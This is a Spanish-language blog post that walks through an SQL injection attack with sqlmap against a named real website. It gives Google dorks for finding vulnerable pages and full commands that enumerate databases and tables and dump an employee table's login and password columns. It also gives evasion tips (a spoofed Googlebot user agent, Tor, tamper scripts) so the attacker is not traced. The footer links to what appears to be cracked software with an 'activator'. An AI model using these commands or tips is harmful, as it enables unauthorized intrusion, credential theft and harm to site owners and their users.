De -

[Imagen: 1.png]

Código:
inurl:item_id=
inurl:review.php?id=
inurl:hosting_info.php?id=
inurl:newsid=
inurl:iniziativa.php?in=
inurl:gallery.php?id=


Luego de ésto, vamos ahora sí a utilizar sqlmap, también puede ser utilizada en windows, sólo se necesita tener Python instalado, pero en mi caso utilizaré Parrot.

Página oficial de sqlmap: http://sqlmap.org/

Una vez comprobado que la página es vulnerable, nos dirigimos a una consola y con el enlace de la página copiado hacemos lo siguiente:

sqlmap -u http://www.icdcprague.org/index.php?id=10%27 --dbs --user-agent="Mozilla 5 (compatible , Googlebot/2.1, http://www.google.com/bot.html)"

[Imagen: 2.p%5B1%5D.png]

En mi caso estoy atacando una web de cuba bastante fácil, por lo que será rápido y sin ningún problema el ataque.
-u  Con esto especificamos el url a atacar.
--dbs Con esto sacamos solamente la base de datos
--user-agent Nos sirve para "camuflar" el ataque, es bastante recomendable utilizarlo ya que al atacar una página dejamos archivos que nos delatan, lo cual puede ser un gran problema si queremos atacar una página en la que no queramos que sepan que fuimos nosotros.

Otros comandos que recomiendo usar para facilitar el ataque y que sea más preciso son:

--level=5 Indica el nivel de ataque, por defecto 1
--risk = 3 Indica el nivel de riesgo, por defecto 1
--random-agent Es parecido al user-agent, pero éste lo hace aleatoriamente
--tor Usa tor para las peticiones
--hex Transforma las peticiones a hexadecimal
--tamper Éste comando sirve para hacer un bypass a los servidores, tiene muchas opciones así que les dejo un enlace para que vean cual les puede servir: https://underc0de.org/foro/pentest/bypas...ap-tamper/
-h Nos lista todos, o la mayoría de los comandos de sqlmap, con una pequeña descripción
--dump-all Nos arrojará toda la información directamente (dbs, tablas, columnas y datos)

Por lo general les pide confirmaciones (Y o N), según lo que nos diga le especificamos la opción.

[Imagen: 3.png]

Como vemos, aquí nos mostró todas las bases de datos que contiene la página. Ahora para listar las tablas de dicha base hacemos lo siguiente, teniendo en cuenta los comandos anteriormente mencionados, lo cuales les recomiendo utilizar para que sea más efectivo el ataque.

sqlmap -u http://www.icdcprague.org/index.php?id=10%27 -D icdcprague --tables --level=5 --risk=3 --user-agent="Mozilla 5 (compatible , Googlebot/2.1, http://www.google.com/bot.html)"

[Imagen: 4.png]

Como vemos he cambiado el --dbs por -D, esto se hace cuando ya se conoce el nombre de la db, lo mismo con las tablas y columnas, además, también añadí los comandos level y risk para hacer más rápido el ataque.

--tables Funciona para sacar las tablas de la db ya especificada

[Imagen: 5.png]

Como podemos ver, ya nos sacó las tablas, en total 101 tablas, el algunos casos, como me pasó a mí, sqlmap va a tener que hacer una evaluación para sacar las tablas, esto puede tardar, pero es lo más acertado.

Ahora sólo queda sacar las columnas, para ello usamos lo siguiente:

sqlmap -u http://www.icdcprague.org/index.php?id=10%27 -D icdcprague -T EMPLEADO --columns --level=5 --risk=3 --user-agent="Mozilla 5 (compatible , Googlebot/2.1, http://www.google.com/bot.html)"

[Imagen: 6.png]

Cambiamos --tables por -T, y añadimos el nombre de la tabla que queramos sacarle las columnas

--columns Nos permite sacar los nombres de las columnas y el tipo (ej: numérico o de texto)

[Imagen: 7.png]

Aquí, al igual que al sacar las tablas, también tenemos que hacer una evaluación. Al finalizar como vemos nos muestra todas las columnas de la tabla, ahora sólo restaría sacar los datos de las columnas.

Para sacar los datos de las columnas vamos a hacer lo siguiente:

#sqlmap -u http://www.icdcprague.org/index.php?id=10%27 -D icdcprague -T EMPLEADO -C account,category_img, login_pw --dump  --level=5 --risk=3 --user-agent="Mozilla 5 (compatible , Googlebot/2.1, http://www.google.com/bot.html)"

-C Acá seleccionamos todas las columnas que queremos sacar separadas por comas
--dump Nos permitirá sacar los datos que hallamos seleccionado, no sólo sirve para las columnas, sino también para las tablas

[Imagen: 8.png]

Ya luego de ésto tendremos todos los datos de las columnas que hallamos especificado, haciendo ésto podríamos encontrar datos importantes como credenciales de los administradores, información de los usuarios (desde contraseñas, hasta cuentas bancarias y tarjetas), y más, así que les invito a que sean precavidos a la hora de hacer cosas como éstas.

Espero que les halla servido, les invito a que investiguen más a fondo, ya que esto sólo es lo básico, aquí les dejo más información que les puede ser útil.

https://mega.nz/#!5RFCRYjQ!BPkTEaMY2D8Ub...uhgWKvNuXc
http://blog.elhacker.net/2014/06/sqlmap-...ction.html
http://www.htforos.com/hacking-cracking/...t3467.html

Comentarios

Publicar un comentario

Entradas populares de este blog

De -
Imagen
  Cheat Engine es una aplicación gratuita que te ayuda a hackear tus juegos sin conexión favoritos.  Puedes cambiar la cantidad de recursos en tu juego y también usar muchos trucos que te ayudarán a terminar el juego rápidamente. Para usar esta herramienta de pirateo de juegos sin ningún problema, debe iniciar esta aplicación antes de comenzar su juego.  Debes permitir que este software se ejecute en segundo plano para que se modifiquen los recursos de tu juego.  Si cierra esta aplicación y no permite que se ejecute en segundo plano, los recursos de su juego volverán a los valores predeterminados. Haz el juego más fácil o más difícil con Cheat Engine Te ayudará a pasar tus niveles de juego rápidamente.  Pero a veces puedes aburrirte porque tu juego será demasiado fácil.  No te preocupes.  Esta herramienta no solo te ayuda a aumentar tu recurso sino que también te ayuda a reducirlo.  Al usar eso, puedes reducir la salud de tu personaje para hacer que tu juego sea más difícil e interesan
Leer más

DriverPack Solution v17.6.13 / v16.5 / v15.12

De -
Imagen
DATOS TÉCNICOS DriverPack Solution v17.6.13 / v16.5 / v15.12 Spanish Incl. | Free | 11.7 GB | 10.7 GB | 7.94 GB (DVD9) | 4.36 GB (DVD Edition) | Win XP/Vista/7/8/10 (32-bit & 64-bit) DESCRIPCIÓN Automatiza el proceso de búsqueda e instalación de Drivers DriverPack Solution es un programa diseñado para ayudarte a encontrar de manera fácil e instalar automáticamente los controladores para tu ordenador. DriverPack Solution simplifica el proceso de reinstalación de Windows en cualquier ordenador. Ya no tendrás problemas al buscar e instalar los controladores. Todo se hará con un par de clics del ratón. CARACTERÍSTICAS Instalación de controlador automatizada: El programa instala todos los controladores necesarios para cualquier ordenador en tan sólo unos 5 minutos. Ahorra tiempo y dinero: Ya no desperdiciarás el tiempo buscando controladores; todos los controladores necesarios se instalarán con sólo unos clics. Cualquier controlador para cualquier ordenador: Todos l
Leer más
De -
Imagen
Detroit Diesel Enlace de diagnóstico (DDDL) v8.04 Inglés + Activador ganar |   570 MB Detroit Diesel Enlace de diagnóstico (DDDL), es una herramienta de diagnóstico que se presenta para mejorar los niveles de servicio DDEC VI Detroit Diesel, equipados con motores (S-60, MBE 4000, MBE 900, HDE).   Página de inicio -   http://www.demanddetroit.com requisitos:   - SO: Windows 7, Windows 8, Windows 8.1   - CPU: Pentium / Athlon de doble núcleo a 2,0 GHz o superior   - Memoria RAM: 2 GB de memoria del sistema   - Disco Duro: 20 GB de espacio disponible   - Nexiq USB-Link con el cable USB (se requiere para el diagnóstico de Cascadia)   - DVD ROM   NITROFLARE.COM - ENLACES INTERCAMBIABLES (500 MB) http://nitroflare.com/view/9A21FCEAE4DC9A5/Detroit.Diesel.Diagnostic.Link.v8.0.4.Plus.Activator.part1.rar http://nitroflare.com/view/B6A15F9799EB966/Detroit.Diesel.Diagnostic.Link.v8.0.4.Plus.Activator.part2.rar FILEUPLOAD.PW - ENLACES INTERCAMBIABLES (500 MB) http://fileupload.
Leer más